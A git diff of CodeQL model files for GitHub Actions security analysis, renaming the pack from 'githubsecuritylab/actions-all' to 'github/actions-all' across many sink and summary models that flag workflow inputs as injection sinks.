8a11ced42d02..9c2d7a421db8 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 4c018b20f223..1410fd6fbe98 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 315c85efeb62..eca441b608a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 8a3132d52582..2868aecd064e 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 9a669c8c009a..0aa2d1c596c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 0ecb817822c0..02fe1b2055f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index e4590eeec8b6..9f6401ec03e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index ea0ddad06978..373b507f2f30 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 9352f766e82d..9b68b660586b 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index d436644f4acd..ddce9773100d 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index c6c01abca904..3aa599e00d70 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index 8a9f76e7e52d..4ff3377e6ebd 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 8b3cfebc67b9..577ffa78d821 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index 9add4859f35a..99ff06a4aee3 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index efc8097b963f..5241bc1bcb1e 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 6a305522cfb4..66221185cbdb 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index 441325c76a5f..eb5207528d4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 5f0831afc073..1337b0e76ec4 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index afd7aabc1fce..1d8b8f0e9f1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index 49e556f585f6..4eaa610a3a2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index 24585aa50ed0..a62139e12c47 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index afc7af28f9b4..2f3f85fe424c 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 5b3d91a8a7ba..f39a027eda7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index b43253eb619a..5a0b692e4e18 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index 89559cf57e3f..ae902cb95ab6 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 6292841e56ad..78379dd7796c 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 9f98fd51139d..0eeed9a1f17e 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index e04605511b89..3ab501e1b1f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index a77181e6c4eb..caa0ee6d7cb1 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6c90e29a43bf..b660b0bc4ec3 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 6bacbc181daa..0fe5470bb11a 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index 83d438d4e3d4..a9cd5759cf2a 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 703a766cb4cb..5b0dc5da53d2 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index ecb4c809efe4..c90d1ac8afbd 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index 9b02577be7d3..8d68efb9247e 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index 1ffc3df1c815..cb127c7ff467 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 53ed1840b0a1..79936a515206 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 17d2ed2e4735..9bc26169b27b 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 68c2552c3505..8aa19f944523 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 977f6b98ae4b..dc86b19a69b1 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 616f7fdb9ca8..bc9f2aad14c1 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index e4961ae5ed63..c3604795c256 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 19cce83c691d..dfcc204c2bac 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index f838eeed0eb8..c8d5e822c02c 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 48e5b05128f8..5c7ec5f957fe 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 448997b3136e..5384571801c6 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index 13af446f37d1..ba5de742701c 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 39e1c9ef6240..ce0fb5734932 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index a442ed5cd531..8f53dfeb118a 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index a22fce01c453..6d7d368c7810 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 74a5c7d592c7..9b0f078d8742 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all 